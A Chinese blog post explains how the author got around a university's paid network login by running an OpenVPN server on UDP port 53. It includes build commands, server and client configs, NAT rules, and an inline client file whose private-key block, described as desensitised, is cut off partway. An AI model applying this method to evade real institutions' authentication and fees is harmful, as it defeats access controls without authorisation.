这篇文章发表于 954 天前,可能其部分内容已经发生变化,如有疑问可询问作者。

上学期的时候我悄咪咪地搞了一个vps,通过UDP53端口绕过了校园网,也就不用付学校钱了,但是当时偷了懒,使用了别人提供的一键脚本。

结果昨天随便一看那个vps的情况,woc十来个CVE。。。

捕获

这安得什么心呐……mdzz再见了您呐。然后我重装了vps的系统。

故事开始了——

ps:文章已经过多次修正,请放心食用 ( ﹁ ﹁ ) ~→

简单介绍与思路

由于种种原因,好多人就单纯以为VPN是专门用来xx的,其实这只是其中的一个用途之一。但是好多人将那些科学的代理软件(像酸酸乳之类的)和VPN这个概念直接混为一谈,这是不对的。具体区别自己去理解。

建议先看完这一篇文章。(貌似现在链接已经挂了2333)

至于原理——像学校这样的网络认证会在你登录认证界面之前建立起联系,某个路由器会记录下你的电脑的Mac地址,然后对照里面的Mac-IP对应关系表,如果不存在这个Mac就添加一条路由记录,然后在你认证前应该就已经有了一个指定的IP地址,这样才能够访问认证界面(此时你电脑与作为网关的路由器等等已在同一内网中,自然能够访问内网上的认证服务),所以你的机器在尚未认证的时候就已经存在能够直接和路由(也就是一个网关)通信的能力。

至于为什么没填账号密码就无法上网是因为没填的时候存在防火墙规则将相应的流量阻拦了。而一般来说这个规则会漏掉UDP53端口(因为要为DNS服务器开放),所以即便没有在登录界面填写账号密码,防火墙也并不会阻拦。于是存在绕过的可能性。当然你可能会问为什么UDP67,68和69端口(和DHCP相关的端口)等等没开放,我不知道,但应该和学校的认证机制有关系。

捕获2

如上图,UDP53端口处于filtered状态,但至少有反应。。(可以看出UDP1103貌似也处于开启的状态,那么这个端口能否实现绕过呢?自行探索吧hhh

ps:突然想起某人说改变Mac地址就能够躲避追踪啥的,其实没用的。因为每过一个网关,包头上面的旧Mac信息就会被丢弃,取而代之的是网关的Mac,也就是说Mac地址没那么容易就暴露,改变自己的Mac地址不过是再加一重小保险而已。只要能找到你的第一个网关上的路由信息,基本上已经能够稳稳定位了。

好了,我们已经知道为什么有机会能够实现绕过了,那么接下来怎么绕过呢?很简单,内网穿透即可——FRP等工具皆可,甚至自写个通信脚本应该都可以通过UDP53而不被察觉。另外,其实不用穿透UDP53方法其实也可以,DNS隧道(我大一下学期试了下)能穿透,但是流量只有可怜的30K左右(这种办法较繁杂,而且丢包严重,直接被放弃)。

这里使用开源的openVPN来搭建一个隧道,个人觉得openVPN是一个强大的组网工具。

这里可能会有人对网速有疑问——经过观察,起主要限速作用的是自己的vps的带宽。像我买个阿里云每月10块左右的学生机(每月最多1000G,一般每月也就用4%),最大有600+K/s,B站看720p的1.5倍速视频几乎不会卡顿(其实看1080p也不会卡)。

接下来谈谈通过UDP53端口实现的操作。

服务端的搭建

这里你先要有一个vps,最好离学校地理距离近一点(减小延迟?)。

我首先尝试了使用docker来搭一个openVPN服务器,能够成功访问到docker的内部网络,但是没法通过它来访问外部网站,于是乎最后放弃这种方案(现在想想应该只是里面路由没配置好)。

以下可行操作基于centos7.3。大部分命令摘自这篇文章

a.生成密钥对

1
2
3
4
5
6
7
8
9
10
11
12
13
cd /root
wget https://codeload.github.com/OpenVPN/easy-rsa-old/zip/master
mv master easy-rsa-old-master.zip
unzip -d /usr/local/ easy-rsa-old-master.zip
cd /usr/local/easy-rsa-old-master/easy-rsa/2.0/
ln -s openssl-1.0.0.cnf openssl.cnf
vi vars #可以先自行修改相关信息
source vars
./clean-all
./build-ca #我反正一路回车,还有两个yes
./build-key-server server
./build-key client
./build-dh

openVPN的通信加密基于这样一对密钥。接下来安装openVPN。

b.编译安装 OpenVPN

1
2
3
4
5
6
7
8
cd /root
wget https://swupdate.openvpn.org/community/releases/openvpn-2.4.4.tar.gz
yum install -y lzo lzo-devel openssl openssl-devel pam pam-devel net-tools git lz4-devel
tar xf /opt/soft/openvpn-2.4.4.tar.gz -C /usr/src/
cd /usr/src/openvpn-2.4.4
./configure --prefix=/usr/local/openvpn
make
make install

产生错误请自行排除。另外,建议openVPN版本为2.4.6及以上,版本过低会存在一定风险。当然高版本也有一些烦人的问题,主要是与ipad端会出现问题(比如2.4.10会出错,其他版本未知,但2.4.4不会)。

c.配置服务端

1
2
3
4
5
6
mkdir -p /etc/openvpn        # openvpn 配置文件路径
mkdir -p /etc/openvpn/pki # openvpn 证书存放位置
/usr/local/openvpn/sbin/openvpn --genkey --secret ta.key
mv ./ta.key /etc/openvpn/pki
cp /usr/local/easy-rsa-old-master/easy-rsa/2.0/keys/{ca.key,ca.crt,server.crt,server.key,dh2048.pem} /etc/openvpn/pki/
cp /usr/src/openvpn-2.4.4/sample/sample-config-files/server.conf /etc/openvpn/

d.文件与路由配置

注意这部分开始和那篇博文的操作有所不同了,你可以试试按照那篇博文的配置会产生什么效果。

编辑服务端配置文件 /etc/openvpn/server.conf

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
port 53
proto udp
dev tun

ca /etc/openvpn/pki/ca.crt
cert /etc/openvpn/pki/server.crt
key /etc/openvpn/pki/server.key # This file should be kept secret
dh /etc/openvpn/pki/dh2048.pem

server 10.8.0.0 255.255.255.0 # 分配给客户端的虚拟局域网段

;ifconfig-pool-persist ipp.txt

;push "route 10.0.0.0 255.0.0.0"
;push "route 192.168.8.0 255.255.255.0" # 如果使用这两条的话,能连上,但是你的连上去的IP地址会暴露,我只希望以vps的IP去访问
push "redirect-gateway def1"
#上面这条会将你本地的所有流量都通过openvpn的server(也就是vps),但这就会导致客户端无法访问之前的局域网中的IP地址,甚至双网卡机器也会出问题
#这是因为它修改了路由表,所以若希望客户端能够访问之前的局域网中的IP地址,在Windows上可以在运行openvpn之前添加一条路由,比如route ADD {ipaddr_youwant} MASK 255.255.255.0 {gateway_ip}
#其中的{gateway_ip}可在客户端连上openvpn之前利用netstat -nr命令来查看,该问题可参见 https://www.thinbug.com/q/16302138

push "dhcp-option DNS 8.8.8.8"
client-to-client
duplicate-cn # 多个客户端可使用同一个账号
keepalive 10 120

tls-auth /etc/openvpn/pki/ta.key 0 # This file is secret
cipher AES-256-CBC
comp-lzo
max-clients 50

user nobody
group nobody

persist-key
persist-tun

status /var/log/openvpn-status.log
log /var/log/openvpn.log
log-append /var/log/openvpn.log

verb 3

# plugin /usr/lib64/openvpn/plugin/lib/openvpn-auth-ldap.so "/etc/openvpn/auth/ldap.conf cn=*"
# client-cert-not-required

以上的配置不清楚的话建议自行查找了解功能,我太菜了不敢瞎说。

然后开启内核路由转发功能:

1
2
echo net.ipv4.ip_forward = 1 >> /etc/sysctl.conf
sysctl -p

配置iptables策略(注意,这些规则在vps重启后很可能会消失——若重启vps后发现能连上VPN但无法访问任何网站,很可能这里出了问题):

1
2
3
4
5
6
systemctl enable iptables
systemctl start iptables
iptables -P FORWARD ACCEPT
iptables -t nat -A POSTROUTING -s 10.8.0.0/24 -o eth0 -j SNAT --to-source 172.24.47.200
iptables-save > /etc/sysconfig/iptables
service iptables restart

其中的172.24.47.200是ifconfig中的eth0的ip地址。如果最后挂上VPN后并不能访问外部网络,排除其他原因,那么基本上是这里配置出错了。

创建openvpn的systemd unit文件,也就是新建/usr/lib/systemd/system/openvpn.service

1
2
3
4
5
6
7
8
9
10
11
12
13
[Unit]
Description=openvpn
After=network.target

[Service]
EnvironmentFile=-/etc/openvpn/openvpn
ExecStart=/usr/local/openvpn/sbin/openvpn --config /etc/openvpn/server.conf
Restart=on-failure
Type=simple
LimitNOFILE=65536

[Install]
WantedBy=multi-user.target

启动并设置为开机启动:

1
2
systemctl start openvpn
systemctl enable openvpn

到了这一步,服务端的配置已经结束了,再确认vps上面的对应端口防火墙放行,随后运行openvpn:service openvpn start即可。

接下来是本地客户端的配置。

客户端配置

客户端安装后(安装没啥难度不多说了),需要在安装目录下的 config 目录下创建客户端的配置文件 client.ovpn 具体内容如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
client
dev tun
proto udp
remote xxx.xxx.xxx.xxx 53
resolv-retry infinite
nobind
persist-key
persist-tun

ca ca.crt
cert client.crt
key client.key
remote-cert-tls server
tls-auth ta.key 1
cipher AES-256-CBC

comp-lzo
verb 3

/usr/local/easy-rsa-old-master/easy-rsa/2.0/keys/etc/openvpn/pki两个文件夹里找到并下载之前生成的ca.crtclient.crtclient.keyta.key,然后放在client.ovpn同级目录下,这时其实已经成功了。

不过有时候可能嫌这么多文件分发给别人比较麻烦,这时我们可以选择将其整合一下,就能让它变成单个配置文件 client-allinone.ovpn 具体格式如下(已做脱敏处理,不要打歪主意哦~):

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
client
dev tun
proto udp
remote xxx.xxx.xxx.xxx 53
resolv-retry infinite
nobind
persist-key
persist-tun

<ca>
-----BEGIN CERTIFICATE-----
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
-----END CERTIFICATE-----
</ca>
<cert>
Certificate:
Data:
Version: 3 (0x2)
Serial Number: 1 (0x1)
Signature Algorithm: sha1WithRSAEncryption
Issuer: C=CN, ST=BJ, L=BeiJing, O=CTSIG, OU=changeme, CN=changeme/name=changeme/emailAddress=ucasz@example.domain
Validity
Not Before: Feb 26 02:29:57 2020 GMT
Not After : Feb 23 02:29:57 2030 GMT
Subject: C=CN, ST=BJ, L=BeiJing, O=CTSIG, OU=changeme, CN=server/name=changeme/emailAddress=ucasz@example.domain
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
Public-Key: (4096 bit)
Modulus:
00:9f:cf:52:4c:d3:1d:5d:63:82:27:f7:7a:89:5b:
d5:44:df:68:7d:b6:60:bb:a6:a5:d3:fa:64:59:ed:
ad:cf:4c:ae:22:20:d7:01:e8:b4:7d:e2:d0:20:6e:
a8:11:f4:96:5c:e3:f4:de:2e:57:65:e5:2b:e7:da:
24:ec:53:ff:5d:11:3e:2e:34:34:e9:86:28:49:5e:
bd:e3:4e:a5:d8:bc:12:70:d5:4b:a4:b1:25:3f:f2:
b5:57:41:e9:1e:f2:46:67:f4:98:fc:35:b6:b7:f2:
0f:cf:34:9d:53:63:53:1c:c4:0f:79:31:a0:3e:a9:
0e:3e:72:95:18:3f:f0:af:7a:44:26:15:43:84:8a:
2f:e6:b5:9b:96:e8:07:1e:4d:da:e0:4b:94:72:d6:
44:f6:b0:fe:72:17:fe:03:1b:38:bc:fc:58:20:da:
41:3d:3f:fb:27:27:35:3c:4e:18:93:03:b3:62:c3:
82:29:3d:67:4d:cf:31:3e:64:c9:14:5d:49:88:e4:
e8:08:16:34:6c:e7:d2:e8:57:e6:73:b0:02:67:25:
99:a3:16:4f:56:2d:c4:49:0c:77:23:28:bf:d9:dd:
45:c4:98:57:21:d5:df:f1:6e:4e:10:ed:a6:e1:a5:
10:ad:31:71:91:9d:45:e5:cb:23:b1:1b:a1:74:8d:
c3:fa:2f:48:69:f7:b0:30:8f:8c:30:e2:85:27:b4:
66:95:e6:86:6f:2b:96:94:2f:c9:9a:89:b8:4c:5d:
7e:e6:e2:d6:c1:cc:65:f6:0f:c8:3b:be:44:08:92:
61:38:4f:18:9f:1b:55:b8:2e:40:26:4a:44:e0:a9:
41:9f:d0:ac:fb:f2:35:c7:be:2d:43:3d:45:bb:79:
e8:c1:a0:26:4c:35:e4:e8:46:56:29:ef:c5:c1:f8:
0d:a1:a7:55:c0:db:c7:50:b9:db:65:9d:eb:fe:fe:
1c:d8:8b:7a:60:dd:4d:b1:d5:0a:d1:79:ae:fe:cf:
f1:06:f8:36:ef:c1:c0:31:32:d4:2b:a9:4f:71:2e:
d9:38:94:4a:c8:3d:f7:7a:53:a1:0f:09:3c:9e:44:
69:61:c3:98:fe:42:6f:48:21:4d:33:1a:b7:fb:c6:
54:18:05:97:b3:36:92:fe:a7:20:65:cf:9a:56:3c:
4c:3f:b7:26:5d:07:95:55:dc:be:4e:62:e0:29:fb:
fb:8f:5b:3e:cd:47:f1:33:4d:b4:2a:ab:67:f1:2d:
a5:2c:3f:d7:da:ce:d0:da:cb:1c:d6:cf:6c:6f:aa:
c3:09:12:4e:e7:0f:30:7f:2d:67:68:e1:5f:d3:44:
03:26:56:ce:28:aa:98:4f:82:24:80:76:6e:96:26:
19:97:f7
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Basic Constraints:
CA:FALSE
Netscape Cert Type:
SSL Server
Netscape Comment:
Easy-RSA Generated Server Certificate
X509v3 Subject Key Identifier:
BB:CC:18:46:E1:5D:B5:CB:5E:44:91:57:75:08:D1:EE:02:BF:93:F0
X509v3 Authority Key Identifier:
keyid:93:44:9F:65:44:9C:61:60:A5:34:BF:E5:EE:0E:17:2C:D6:67:6B:E0
DirName:/C=CN/ST=BJ/L=BeiJing/O=CTSIG/OU=changeme/CN=changeme/name=changeme/emailAddress=ucasz@example.domain
serial:C7:07:F3:23:0D:BA:77:FE

X509v3 Extended Key Usage:
TLS Web Server Authentication
X509v3 Key Usage:
Digital Signature, Key Encipherment
Signature Algorithm: sha1WithRSAEncryption
b8:b2:0d:1c:36:52:b7:54:12:f5:10:8f:39:da:ee:95:1e:17:
0b:fd:44:00:17:0f:3d:3f:6d:e0:22:91:b0:0f:0f:e5:2d:9b:
a1:38:24:a6:77:c4:4a:6f:7a:c5:dc:40:a1:73:eb:54:2a:29:
7f:e5:7a:7a:00:d3:48:b9:15:b3:68:79:59:ae:c9:8d:c2:d9:
d9:ae:88:73:0f:93:3e:5b:dd:ad:a4:f2:23:3b:29:e1:52:1d:
95:ce:30:ea:7b:4a:42:d7:61:35:48:a9:0c:eb:21:fd:66:1d:
6f:62:24:dd:62:f0:76:1e:de:c5:73:ee:90:23:48:d8:2b:94:
d0:0e:bb:2f:34:dc:ad:31:b3:52:37:82:f9:45:a6:ba:27:d4:
37:11:99:0b:e1:09:b9:69:2e:61:c9:2c:d1:e6:f8:fe:73:31:
a8:cf:e2:41:73:b6:88:a1:4e:4e:8d:56:3c:cb:11:2d:e3:3e:
0a:d0:5a:67:38:c3:b8:11:25:8e:ea:b4:28:78:df:97:5b:be:
2e:19:90:08:1c:5d:47:db:76:c0:b2:e4:1f:fb:3c:08:a9:f9:
38:ca:0f:83:c1:f8:dc:b0:d9:05:5a:e2:a4:70:55:ec:ad:70:
bd:b0:14:69:77:32:3c:80:3b:df:76:87:e7:7b:92:fb:a0:14:
e9:6b:6d:8f:0a:27:68:83:c8:68:1b:44:a3:9e:10:e9:1b:7c:
c4:b4:18:e7:3e:82:3d:9a:75:0e:5a:b5:a5:3a:64:d0:32:49:
7b:bd:ef:63:cf:b9:25:b4:fa:a3:7a:fd:1c:ed:4b:d6:cd:5e:
00:dd:7b:56:48:ed:c2:7f:27:f5:78:48:59:f0:44:48:60:99:
0a:b8:e2:33:4e:b0:ab:8b:d1:c1:c2:fa:53:3b:6c:84:c6:14:
70:03:a9:15:25:74:c9:31:b2:8a:2c:2e:14:04:cc:a8:36:6d:
07:6e:fc:38:64:a7:f0:06:76:f3:e6:fb:7b:d9:11:d3:a4:3e:
06:ec:00:b1:7a:6c:02:e6:df:23:45:13:4b:00:ce:eb:f2:b8:
9e:e1:47:97:90:1b:e0:5f:79:d5:e9:5b:7e:fe:ff:1f:17:8d:
cb:93:bf:94:09:19:65:06:3d:2b:d3:87:4e:d2:8e:82:53:89:
bb:73:80:a2:d5:2e:2d:d4:71:f3:6c:b3:37:06:12:3a:bf:13:
68:a2:df:e5:19:81:ff:9f:5a:12:f2:bc:4f:86:31:b8:a8:ef:
10:e9:97:a7:b3:c2:25:e8:b6:9a:a0:6a:ed:eb:d3:cc:58:59:
ec:04:f5:0a:95:00:7e:31:7c:7c:e5:4a:86:eb:48:ec:b9:ad:
42:81:e0:0b:13:5b:9e:d0
-----BEGIN CERTIFICATE-----
MIIG9jCCBN6gAwIBAgIBAjANBgkqhkiG9w0BAQUFABCDljELMAkGA1UEBhMCQ04x
CzAJBgNVBAgTAkJKMRAwDgCWUQQHEwdCZWlKaW5nMQ4wDAYDVQQKEwVDVFNJRzER
MA8GA1UECxMIY2hhbmdlbWUxETAPBgNVBAMTCGNoYW5nZW1lMREwDwYDVQQpEwhj
aGFuZ2VtZTEfMB0GCSqGSIb3DQEJARYQbWFpbEBob3N0LmRvbWFpbjAeFw0yMDAy
MjYwMjMwNDNaFw0zYDAyMjMwMjMwNDNaMIGUMQswCQYDVQQGEwJDTjELMAkGA1UE
CBMCQkoxEDAOBgNVBAcTB0JlaUppbmcxDjAMBgNVBAoTBUNUU0lHMREwDwYDVQQL
EwhjaGFuZ2VtZTEPMA0GA1UEAxMGY2xpZW50MREwDwYDVQQpEwhjaGFuZ2VtZTEf
MB0GCSqGSIb3DQEJARYQbWFpbEBob3N0LmRvbWFpbjCCAiIwDQYJKoZIhvcNAQEB
BQADggIPADCCAgoCggAMBVv+4ElnpSTR/RLYrh9q0k+tlUEZknL/3PaoILSEuDxq
yOpV21QdvmAs86nnkSXzcinmn/hnc37lX2gIDrSfhyKRkq5qiTV81l6FFrwgAYUe
K7LFZLMjHNTsHHoLSlz13VYZ0lBfBl3+d3yDUhYMtJDHBSiE7CN3AGqVtlOaVq+/
9kxI3LdHhPADpkvoL68Uggn+4gPL1pAGATad1sy4tbAuokLCp1DjZhCaWxvAI8zj
PFSgPYReQtPY8P46Z/wRUsB6N/9iUKZthGBCmXfWQj8xyXggLP70KgX7nc9Je+Rb
TTMp/M0Vzvss4P62x/kavuJ9Hz8Rsp7DW3zgND7G8HoLL5LfMmMthOEcT8RfCmla
ufgCHO2Lfp0d8e9l8/9UdHfAg0vrZMnvglm5NpsuFv2F0U1m9ivAVm8qOeP0/UVx
ABUgL8cNOJKMSi5dcYVHKlIGreq/CcNRypn0/IBUOgqSCUNE9DtxjIiP+59a7AhI
RABnObIo3pi+VliFHKk9UrvPLRYkkPCx01jc8QzhTlLQPMc/xJJpbgPSYFcyPWML
YkCGlcpYkDfkr//Tj6c0yd8BNoN3H3a4j4kYvg2+3sWAwMdqfhSOBb9JFOZGEHlo
Nf6mqk7H1+hwgbZnuFuQEKHRt43i7uWqln32jP0ZPcbJPptcFIBtlVKgWlC5xWl7
AgMBAAGjggFNMIIBSTAJBgNVHRMEAjAAMC0GCWCGSAGG+EIBDQQgFh5FYXN5LVJT
QSBHZW5lcmF0ZWQgQ2VydGlmaWNhdGUwHQYDVR0OBBYEFNyQqVYV1ydpjfCLCccJ
93uX8lb4MIHLBgNVHSMEgcMwgcCAFJNEn2VEnGGApTS/5f4OFyzWZ2vgoYGcpIGZ
MIGWMQswCQYDVQQGEwJDTjELMAkGA1UECBMCQkoxEDAOBgNVBAcTB0JlaUppbmcx
DjAMBgNVBAoTBUNUU0lHMREwDwYDVQQLEwhjaGFuZ2VtZTERMA8GA1UEAxMIY2hh
bmdlbWUxETAPBgNVBCkTCGNoYW5nZW1lMR8wHQYJKoZIhvcNAQkBFhBtYWlsQGhv
c3QuZG9tYWluggkAxwfzIw26d/4wEwYDVR0lBAwwCgYIKwYBBQUHAwIwCwYDVR0P
BAQDAgeAMA0GCSqGSIb3DQEBBQUAA4ICAQC5lP/aqZZgWwWEq4oyEEFLN2JIVOnu
5BYs1uUstIhPZiejujEoSZlaEEm24RPTMt1Fj+BjGJsNb8ge1AfKZKnsWnSndOtL
h7bv6fHogCMPMo91K9GDSpGrX12Fyb5vXYyaa9syiAS/9u32DX/VS2Jfp1rZIlL6
VE0YJhNIV0+ejuB/pIe/2ZCZKli2Y3+kL21XLrNbLO9DiEHjBcWKJ9Pjpc3x6Lmr
PseDByfd4oSI5Tk79nQJCvERGAWtmTnOfdE7lV/UUDi+sIUAq//1rZe6mqhLIYdb
5K90wpbT4xc51BFLZfIkvUOAw0f/i2niD36st7QsinWtrQdlARD7Osv/1Ornk5R7
DqHQqnhRG0gPt3OlfVp4KTULLEWelHGqI8ODQND4m8Xy6vklpkmqug+TBw+UlxBk
ObEonzoDG+VMXja9BWZlT+Uah6VitcbjlGAnkncxnzGUGaKk2qkmhZwFEqt5KfYi
+BRfx201g2JXxpl/LT20pOQ9zziZ0jzPPMsNk25iV6N9M7JTpODdkrmBbEd359pf
21r/zh12334V1TaxP8wgh5QzNwyIg5FhkFsKLtZuKRlXbK0hd4l8v4C0fxf/kRde
zlqjIndZUf1R/B456OBODIQf3iJ9fHw+5KEspogbK2lWGXqOFzHmtpI0z4S/rHG8
Ojm/PKW2BCGChA==
-----END CERTIFICATE-----
</cert>
<key>
-----BEGIN PRIVATE KEY-----
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
